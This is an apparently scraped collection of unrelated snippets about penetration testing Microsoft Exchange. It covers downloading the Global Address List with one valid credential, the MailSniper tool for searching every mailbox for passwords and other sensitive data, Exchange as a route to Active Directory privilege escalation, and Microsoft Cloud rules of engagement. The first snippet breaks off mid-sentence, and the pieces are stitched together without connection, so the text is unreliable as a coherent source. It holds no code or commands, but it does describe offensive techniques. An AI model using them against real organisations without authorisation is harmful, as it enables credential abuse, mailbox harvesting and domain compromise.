Very often on external penetration tests we perform a reconnaissance phase that might yield us some email addresses or usernames of an organization. If we can successfully find valid credentials for any one of them, and the organization has an Outlook Web Access or Exchange Web Services portal it is possible to download the entire Global Address List from the Exchange server. So, from one valid credential we can now have access to all email addresses for every employee of an organization. There is a function called FindPeople that will allow you to pull back the entire GAL with a single request. Unfortunately, this function is only implemented in Exchange version
Exchange-AD-Privesc: Exchange privilege escalations to Active Directory • Penetration Testing
Meet MailSniper, a new pen tester tool that may be of interest to you if you need to find sensitive data such as passwords, credit card numbers and healthcare data, or need to access databases, or even to discover insider and network architecture information. Beau Bullock , from the penetration testing firm Black Hills Information Security , cited a Mandiant M-Trends Report pdf which claimed organizations are compromised an average of days before detecting a breach. That long of a window gives attackers plenty of time to locate, compromise and exfiltrate sensitive data; pen testers, however, may only have a window of five days or less to do the same thing in order to prove risk to an organization. While Microsoft Exchange does have tools for searching email, Bullock was intent on creating a tool which could provide a new search function capable of searching every mailbox in a domain for specific terms. It becomes a brand new privilege escalation vector. Invoke-GlobalMailSearch searches through all mailboxes on an Exchange server. Bullock had plenty of other search suggestions which could be used to discover sensitive information, insider intel and network architecture information.
Meet MailSniper, a tool to search Microsoft Exchange emails for sensitive info
This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security. For pentesters looking to take control of an AD domain, Exchange is a valid intermediary target. The servers are much less secure than domain controllers by default and the control groups are distinct in the usual permissions models, which provides numerous alternative targets. They are also more difficult to migrate and business critical, so organizations often adopt a slower migration process for Exchange than for AD and do not specifically harden the servers.
In many cases, the Microsoft Cloud uses shared infrastructure to host your assets and assets belonging to other customers. Care must be taken to limit all penetration tests to your assets and avoid unintended consequences to other customers around you. These Rules of Engagement are designed to allow you to effectively evaluate the security of your assets while preventing harm to other customers or the infrastructure itself. All penetration tests must follow the Microsoft Cloud Penetration Testing Rules of Engagement as detailed on this page. Your use of The Microsoft Cloud, will continue to be subject to the terms and conditions of the agreement s under which you purchased the relevant service.